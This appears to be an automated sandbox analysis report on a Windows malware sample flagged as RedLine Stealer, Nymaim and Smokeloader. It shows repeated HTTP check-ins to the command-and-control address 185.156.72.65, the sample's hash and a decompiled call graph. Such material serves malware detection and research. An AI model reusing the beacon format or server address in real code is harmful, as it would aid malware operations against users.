Nov 30, 2024 10:44:33.601413012 CET | 49717 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:33.721401930 CET | 80 | 49717 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:36.612258911 CET | 49718 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:36.732453108 CET | 80 | 49718 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:36.732549906 CET | 49718 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:36.732920885 CET | 49718 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:36.852942944 CET | 80 | 49718 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:54.671025038 CET | 49718 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:57.688821077 CET | 49719 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:57.808979034 CET | 80 | 49719 | 185.156.72.65 | 192.168.2.8
Nov 30, 2024 10:44:57.809392929 CET | 49719 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:57.809648037 CET | 49719 | 80 | 192.168.2.8 | 185.156.72.65
Nov 30, 2024 10:44:57.929661036 CET | 80 | 49719 | 185.156.72.65 | 192.168.2.8
                      • 185.156.72.65
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 185.156.72.65 | 80 | 7788 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 10:41:04.933504105 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 185.156.72.65 | 80 | 7788 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 10:41:29.927345991 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49710 | 185.156.72.65 | 80 | 7788 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 10:41:55.041784048 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49712 | 185.156.72.65 | 80 | 7788 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 10:42:06.236412048 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49713 | 185.156.72.65 | 80 | 7788 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 10:42:31.342145920 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49714 | 185.156.72.65 | 80 | 7788 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Nov 30, 2024 10:42:56.388696909 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 6
                      Source IP: 192.168.2.8
                      Source Port: 49715
                      Destination IP: 185.156.72.65
                      Destination Port: 80
                      PID: 7788
                      Process: C:\Users\user\Desktop\file.exe
                      Timestamp: Nov 30, 2024 10:43:21.457329988 CET
                      Bytes transferred: 416
                      Direction: OUT
                      Data:
                      GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 7
                      Source IP: 192.168.2.8
                      Source Port: 49716
                      Destination IP: 185.156.72.65
                      Destination Port: 80
                      PID: 7788
                      Process: C:\Users\user\Desktop\file.exe
                      Timestamp: Nov 30, 2024 10:43:46.600469112 CET
                      Bytes transferred: 416
                      Direction: OUT
                      Data:
                      GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 8
                      Source IP: 192.168.2.8
                      Source Port: 49717
                      Destination IP: 185.156.72.65
                      Destination Port: 80
                      PID: 7788
                      Process: C:\Users\user\Desktop\file.exe
                      Timestamp: Nov 30, 2024 10:44:11.653470039 CET
                      Bytes transferred: 416
                      Direction: OUT
                      Data:
                      GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 9
                      Source IP: 192.168.2.8
                      Source Port: 49718
                      Destination IP: 185.156.72.65
                      Destination Port: 80
                      PID: 7788
                      Process: C:\Users\user\Desktop\file.exe
                      Timestamp: Nov 30, 2024 10:44:36.732920885 CET
                      Bytes transferred: 416
                      Direction: OUT
                      Data:
                      GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache


                      Session ID: 10
                      Source IP: 192.168.2.8
                      Source Port: 49719
                      Destination IP: 185.156.72.65
                      Destination Port: 80
                      PID: 7788
                      Process: C:\Users\user\Desktop\file.exe
                      Timestamp: Nov 30, 2024 10:44:57.809648037 CET
                      Bytes transferred: 416
                      Direction: OUT
                      Data:
                      GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
                      Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                      Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                      Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                      Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                      User-Agent: 1
                      Host: 185.156.72.65
                      Connection: Keep-Alive
                      Cache-Control: no-cache



                      Target ID:0
                      Start time:04:40:59
                      Start date:30/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x400000
                      File size:2'027'520 bytes
                      MD5 hash:AC44247E8835B336845AD56B84583656
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3842769530.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1418979529.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false


                        Execution Graph

                        Execution Coverage:1.6%
                        Dynamic/Decrypted Code Coverage:5.3%
                        Signature Coverage:3.5%
                        Total number of Nodes:564
                        Total number of Limit Nodes:5
                        execution_graph 30921 40a0b1 30922 40a0bd ___scrt_is_nonwritable_in_current_image 30921->30922 30949 409e11 30922->30949 30924 40a0c4 30925 40a217 30924->30925 30936 40a0ee ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 30924->30936 30976 40a58a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __CreateFrameInfo 30925->30976 30927 40a21e 30977 4106ab 21 API calls __CreateFrameInfo 30927->30977 30929 40a224 30978 41066f 21 API calls __CreateFrameInfo 30929->30978 30931 40a22c 30932 40a10d 30933 40a18e 30957 40a6a5 30933->30957 30936->30932 30936->30933 30975 410685 39 API calls 4 library calls 30936->30975 30950 409e1a 30949->30950 30979 40a2ec IsProcessorFeaturePresent 30950->30979 30952 409e26 30980 40b77d 10 API calls 2 library calls 30952->30980 30954 409e2b 30955 409e2f 30954->30955 30981 40b79c 7 API calls 2 library calls 30954->30981 30955->30924 30982 40b570 30957->30982 30959 40a6b8 GetStartupInfoW 30960 40a194 30959->30960 30961 412288 30960->30961 30984 41816d 30961->30984 30963 40a19c 30966 4087e0 30963->30966 30965 412291 30965->30963 30990 41841d 39 API calls 30965->30990 30993 402460 30966->30993 30969 402460 43 API calls 30970 408807 30969->30970 30997 405a50 30970->30997 30975->30933 30976->30927 30977->30929 30978->30931 30979->30952 30980->30954 30981->30955 30983 40b587 30982->30983 30983->30959 30983->30983 30985 4181a8 30984->30985 30986 418176 30984->30986 30985->30965 30991 41299d 39 API calls 3 library calls 30986->30991 30988 418199 30992 417f78 49 API calls 3 library calls 30988->30992 30990->30965 30991->30988 30992->30985 30994 402483 30993->30994 30994->30994 31312 402760 30994->31312 30996 402495 30996->30969 31339 410822 GetSystemTimeAsFileTime 30997->31339 30999 405a9f 31341 4106e2 30999->31341 31002 402760 43 API calls 31003 405ada 31002->31003 31004 402760 43 API calls 31003->31004 31005 405ca0 31004->31005 31344 403ab0 
31005->31344 31007 405e9f 31356 406c40 31007->31356 31009 40620c 31010 402460 43 API calls 31009->31010 31011 40621c 31010->31011 31366 402390 31011->31366 31013 406230 31374 406ee0 31013->31374 31015 40630a 31016 402460 43 API calls 31015->31016 31017 40631a 31016->31017 31018 402390 39 API calls 31017->31018 31019 40632e 31018->31019 31020 406404 31019->31020 31021 406336 31019->31021 31437 407290 53 API calls 2 library calls 31020->31437 31429 406f60 53 API calls 2 library calls 31021->31429 31024 40633b 31026 402460 43 API calls 31024->31026 31025 406409 31027 402460 43 API calls 31025->31027 31028 40634b 31026->31028 31029 406419 31027->31029 31430 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31028->31430 31033 402390 39 API calls 31029->31033 31031 406354 31032 402390 39 API calls 31031->31032 31034 40635c 31032->31034 31035 40642d 31033->31035 31431 406ff0 53 API calls 2 library calls 31034->31431 31188 4064ee 31035->31188 31438 407310 53 API calls 2 library calls 31035->31438 31037 406361 31042 402460 43 API calls 31037->31042 31040 4064f8 31044 402460 43 API calls 31040->31044 31041 40643a 31043 402460 43 API calls 31041->31043 31045 406371 31042->31045 31046 40644a 31043->31046 31047 406508 31044->31047 31432 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31045->31432 31439 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31046->31439 31055 402390 39 API calls 31047->31055 31049 40637a 31051 402390 39 API calls 31049->31051 31053 406382 31051->31053 31052 406453 31054 402390 39 API calls 31052->31054 31433 407070 53 API calls 2 library calls 31053->31433 31057 40645b 31054->31057 31058 40651c 31055->31058 31440 407390 53 API calls 2 library calls 31057->31440 31270 406603 31058->31270 31447 4076b0 53 API calls 2 library calls 31058->31447 31059 406387 31066 402460 43 API calls 31059->31066 31062 406460 31068 402460 43 API calls 31062->31068 31064 40660d 31069 402460 43 API calls 31064->31069 31065 406529 31071 402460 43 
API calls 31065->31071 31067 406397 31066->31067 31076 402390 39 API calls 31067->31076 31070 406470 31068->31070 31072 40661d 31069->31072 31441 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31070->31441 31074 406539 31071->31074 31085 402390 39 API calls 31072->31085 31448 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31074->31448 31080 4063ab 31076->31080 31077 406479 31078 402390 39 API calls 31077->31078 31081 406481 31078->31081 31079 406542 31082 402390 39 API calls 31079->31082 31083 4063cc 31080->31083 31084 4063af 31080->31084 31442 407410 53 API calls 2 library calls 31081->31442 31087 40654a 31082->31087 31435 407180 53 API calls 2 library calls 31083->31435 31434 407100 53 API calls 2 library calls 31084->31434 31090 406631 31085->31090 31449 407730 53 API calls 2 library calls 31087->31449 31091 4066b3 31090->31091 31092 406635 31090->31092 31464 407c70 53 API calls 2 library calls 31091->31464 31458 407ae0 53 API calls 2 library calls 31092->31458 31093 406486 31103 402460 43 API calls 31093->31103 31095 4063d1 31104 402460 43 API calls 31095->31104 31096 4063b4 31102 402460 43 API calls 31096->31102 31099 40654f 31106 402460 43 API calls 31099->31106 31100 4066b8 31108 402460 43 API calls 31100->31108 31101 40663a 31109 402460 43 API calls 31101->31109 31283 4063c4 31102->31283 31105 406496 31103->31105 31107 4063e1 31104->31107 31117 402390 39 API calls 31105->31117 31110 40655f 31106->31110 31119 402390 39 API calls 31107->31119 31112 4066c8 31108->31112 31113 40664a 31109->31113 31450 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31110->31450 31125 402390 39 API calls 31112->31125 31459 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31113->31459 31115 406875 31120 402390 39 API calls 31115->31120 31122 4064aa 31117->31122 31118 406568 31123 402390 39 API calls 31118->31123 31124 4063f5 31119->31124 31221 4066a7 31120->31221 31121 406653 31126 402390 39 API calls 31121->31126 31127 4064b8 
31122->31127 31128 4064ae 31122->31128 31129 406570 31123->31129 31124->31221 31436 407210 53 API calls 2 library calls 31124->31436 31132 4066dc 31125->31132 31133 40665b 31126->31133 31444 407520 53 API calls 2 library calls 31127->31444 31443 4074a0 53 API calls 2 library calls 31128->31443 31451 4077b0 53 API calls 2 library calls 31129->31451 31137 4066e0 31132->31137 31138 40675e 31132->31138 31460 407b60 53 API calls 2 library calls 31133->31460 31465 407d00 53 API calls 2 library calls 31137->31465 31471 407e80 53 API calls 2 library calls 31138->31471 31140 406575 31149 402460 43 API calls 31140->31149 31141 4068a1 31388 4083f0 31141->31388 31144 4064bd 31150 402460 43 API calls 31144->31150 31146 406763 31157 402460 43 API calls 31146->31157 31147 4066e5 31158 402460 43 API calls 31147->31158 31148 406660 31154 402460 43 API calls 31148->31154 31152 406585 31149->31152 31153 4064cd 31150->31153 31151 4068aa 31162 402460 43 API calls 31151->31162 31452 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31152->31452 31167 402390 39 API calls 31153->31167 31155 406670 31154->31155 31461 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31155->31461 31163 406773 31157->31163 31159 4066f5 31158->31159 31466 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31159->31466 31161 40658e 31166 402390 39 API calls 31161->31166 31168 4068bd 31162->31168 31175 402390 39 API calls 31163->31175 31165 406679 31170 402390 39 API calls 31165->31170 31171 406596 31166->31171 31172 4064e1 31167->31172 31398 408370 31168->31398 31169 4066fe 31176 402390 39 API calls 31169->31176 31177 406681 31170->31177 31453 407830 53 API calls 2 library calls 31171->31453 31172->31221 31445 4075b0 53 API calls 2 library calls 31172->31445 31174 4068c8 31189 402460 43 API calls 31174->31189 31179 406787 31175->31179 31180 406706 31176->31180 31462 407bf0 53 API calls 2 library calls 31177->31462 31184 40678b 31179->31184 31185 4067de 31179->31185 31467 407d80 53 API 
calls 2 library calls 31180->31467 31182 40659b 31195 402460 43 API calls 31182->31195 31472 407f10 53 API calls 2 library calls 31184->31472 31477 4080d0 53 API calls 2 library calls 31185->31477 31187 406686 31198 402460 43 API calls 31187->31198 31446 407630 53 API calls 2 library calls 31188->31446 31193 4068db 31189->31193 31191 40670b 31201 402460 43 API calls 31191->31201 31408 4082d0 31193->31408 31194 406790 31204 402460 43 API calls 31194->31204 31199 4065ab 31195->31199 31196 4067e3 31203 402460 43 API calls 31196->31203 31202 406696 31198->31202 31207 402390 39 API calls 31199->31207 31200 4068e6 31213 402460 43 API calls 31200->31213 31205 40671b 31201->31205 31463 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31202->31463 31208 4067f3 31203->31208 31209 4067a0 31204->31209 31468 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31205->31468 31212 4065bf 31207->31212 31223 402390 39 API calls 31208->31223 31473 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31209->31473 31211 40669f 31216 402390 39 API calls 31211->31216 31217 4065c8 31212->31217 31454 4078c0 53 API calls 2 library calls 31212->31454 31218 4068f9 31213->31218 31215 406724 31220 402390 39 API calls 31215->31220 31216->31221 31455 407940 53 API calls 2 library calls 31217->31455 31418 408da0 31218->31418 31219 4067a9 31226 402390 39 API calls 31219->31226 31227 40672c 31220->31227 31384 4017a0 31221->31384 31228 406807 31223->31228 31231 4067b1 31226->31231 31469 407e00 53 API calls 2 library calls 31227->31469 31228->31221 31478 408150 53 API calls 2 library calls 31228->31478 31229 4065d2 31240 402460 43 API calls 31229->31240 31474 407fd0 53 API calls 2 library calls 31231->31474 31233 406731 31243 402460 43 API calls 31233->31243 31236 4067b6 31246 402460 43 API calls 31236->31246 31238 406926 31426 408eb0 31238->31426 31239 406810 31251 402460 43 API calls 31239->31251 31244 4065e2 31240->31244 31247 406741 31243->31247 31256 402390 39 API calls 
31244->31256 31245 408e00 43 API calls 31248 406953 31245->31248 31249 4067c6 31246->31249 31470 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31247->31470 31252 408eb0 43 API calls 31248->31252 31475 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31249->31475 31255 406820 31251->31255 31258 406968 31252->31258 31254 40674a 31260 402390 39 API calls 31254->31260 31479 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31255->31479 31257 4065f6 31256->31257 31257->31221 31456 4079d0 53 API calls 2 library calls 31257->31456 31262 408e00 43 API calls 31258->31262 31259 4067cf 31263 402390 39 API calls 31259->31263 31260->31221 31266 406980 31262->31266 31267 4067d7 31263->31267 31264 406829 31268 402390 39 API calls 31264->31268 31271 402390 39 API calls 31266->31271 31476 408050 53 API calls 2 library calls 31267->31476 31269 406831 31268->31269 31480 4081d0 53 API calls 2 library calls 31269->31480 31457 407a50 53 API calls 2 library calls 31270->31457 31274 40698e 31271->31274 31276 402390 39 API calls 31274->31276 31275 406836 31280 402460 43 API calls 31275->31280 31277 406999 31276->31277 31278 402390 39 API calls 31277->31278 31281 4069a4 31278->31281 31279 4067dc 31282 402460 43 API calls 31279->31282 31284 406846 31280->31284 31285 402390 39 API calls 31281->31285 31282->31283 31483 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31283->31483 31481 4023e0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31284->31481 31287 4069af 31285->31287 31289 402390 39 API calls 31287->31289 31288 40684f 31291 402390 39 API calls 31288->31291 31290 4069ba 31289->31290 31292 402390 39 API calls 31290->31292 31293 406857 31291->31293 31294 4069c5 31292->31294 31482 408250 53 API calls 2 library calls 31293->31482 31296 402390 39 API calls 31294->31296 31297 4069d0 31296->31297 31298 402390 39 API calls 31297->31298 31301 4069df 31298->31301 31299 406a3e Sleep 31299->31301 31300 402460 43 API calls 31300->31301 31301->31299 
31301->31300 31302 406a47 31301->31302 31303 402390 39 API calls 31302->31303 31304 406a4f 31303->31304 31484 408c80 43 API calls 2 library calls 31304->31484 31306 406a60 31485 408c80 43 API calls 2 library calls 31306->31485 31308 406a79 31486 408c80 43 API calls 2 library calls 31308->31486 31310 406a8c 31487 404f70 130 API calls 6 library calls 31310->31487 31313 402830 31312->31313 31314 40277f 31312->31314 31330 401600 43 API calls 3 library calls 31313->31330 31315 40278b __InternalCxxFrameHandler 31314->31315 31317 4027b3 31314->31317 31319 4027f7 31314->31319 31320 4027ee 31314->31320 31315->30996 31328 401560 41 API calls 3 library calls 31317->31328 31318 402835 31331 401560 41 API calls 2 library calls 31318->31331 31327 4027cf __InternalCxxFrameHandler 31319->31327 31329 401560 41 API calls 3 library calls 31319->31329 31320->31317 31320->31318 31323 4027c6 31323->31327 31332 40cfef 31323->31332 31327->30996 31328->31323 31329->31327 31330->31318 31331->31323 31337 40cf2b 39 API calls ___std_exception_copy 31332->31337 31334 40cffe 31338 40d00c 11 API calls __CreateFrameInfo 31334->31338 31336 40d00b 31337->31334 31338->31336 31340 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 31339->31340 31340->30999 31488 4128e2 GetLastError 31341->31488 31355 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31344->31355 31348 403c33 31348->31007 31349 403b8d 31350 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31349->31350 31351 403c37 31349->31351 31527 409a17 31350->31527 31353 40cfef 39 API calls 31351->31353 31352 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31352->31350 31352->31351 31535 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31352->31535 31354 403c3c 31353->31354 31355->31351 31355->31352 31534 408c80 43 API calls 2 library calls 31355->31534 31357 406c6c 31356->31357 31365 406c9e 31356->31365 31537 409cc5 6 API calls 31357->31537 31359 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31360 406cb0 
31359->31360 31360->31009 31361 406c76 31361->31365 31538 409fd7 42 API calls 31361->31538 31363 406c94 31539 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31363->31539 31365->31359 31367 40239b 31366->31367 31368 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31366->31368 31367->31368 31369 40cfef 39 API calls 31367->31369 31368->31013 31370 4023da 31369->31370 31371 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31370->31371 31372 40cfef 39 API calls 31370->31372 31371->31013 31373 40245c 31372->31373 31375 406f48 31374->31375 31376 406f0e 31374->31376 31377 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31375->31377 31540 409cc5 6 API calls 31376->31540 31380 406f5b 31377->31380 31379 406f18 31379->31375 31541 409fd7 42 API calls 31379->31541 31380->31015 31382 406f3e 31542 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31382->31542 31385 4017b3 __CreateFrameInfo 31384->31385 31543 409b8a 31385->31543 31387 4017ca __CreateFrameInfo 31387->31141 31389 40845e 31388->31389 31390 408422 31388->31390 31392 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31389->31392 31570 409cc5 6 API calls 31390->31570 31393 408470 31392->31393 31393->31151 31394 40842c 31394->31389 31571 409fd7 42 API calls 31394->31571 31396 408454 31572 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31396->31572 31399 40839c 31398->31399 31407 4083ce 31398->31407 31573 409cc5 6 API calls 31399->31573 31400 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31402 4083e0 31400->31402 31402->31174 31403 4083a6 31403->31407 31574 409fd7 42 API calls 31403->31574 31405 4083c4 31575 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31405->31575 31407->31400 31409 40830d 31408->31409 31417 408352 31408->31417 31576 409cc5 6 
API calls 31409->31576 31410 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31412 408365 31410->31412 31412->31200 31413 408317 31413->31417 31577 409fd7 42 API calls 31413->31577 31415 408348 31578 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31415->31578 31417->31410 31419 408db4 31418->31419 31579 409310 31419->31579 31421 40690e 31422 408e00 31421->31422 31423 408e1b 31422->31423 31424 408e2f __InternalCxxFrameHandler 31423->31424 31585 402840 43 API calls 3 library calls 31423->31585 31424->31238 31586 409130 31426->31586 31428 40693b 31428->31245 31429->31024 31430->31031 31431->31037 31432->31049 31433->31059 31434->31096 31435->31095 31436->31096 31437->31025 31438->31041 31439->31052 31440->31062 31441->31077 31442->31093 31443->31096 31444->31144 31445->31188 31446->31040 31447->31065 31448->31079 31449->31099 31450->31118 31451->31140 31452->31161 31453->31182 31454->31217 31455->31229 31456->31270 31457->31064 31458->31101 31459->31121 31460->31148 31461->31165 31462->31187 31463->31211 31464->31100 31465->31147 31466->31169 31467->31191 31468->31215 31469->31233 31470->31254 31471->31146 31472->31194 31473->31219 31474->31236 31475->31259 31476->31279 31477->31196 31478->31239 31479->31264 31480->31275 31481->31288 31482->31279 31483->31115 31484->31306 31485->31308 31486->31310 31489 4128fe 31488->31489 31490 4128f8 31488->31490 31494 412902 31489->31494 31518 4135e5 6 API calls __dosmaperr 31489->31518 31517 4135a6 6 API calls __dosmaperr 31490->31517 31493 41291a 31493->31494 31495 412922 31493->31495 31496 412987 SetLastError 31494->31496 31519 413294 14 API calls __dosmaperr 31495->31519 31498 405aa8 Sleep 31496->31498 31499 412997 31496->31499 31498->31002 31526 411109 39 API calls __CreateFrameInfo 31499->31526 31500 41292f 31502 412937 31500->31502 31503 412948 31500->31503 31520 4135e5 6 API calls __dosmaperr 31502->31520 31521 4135e5 6 API calls 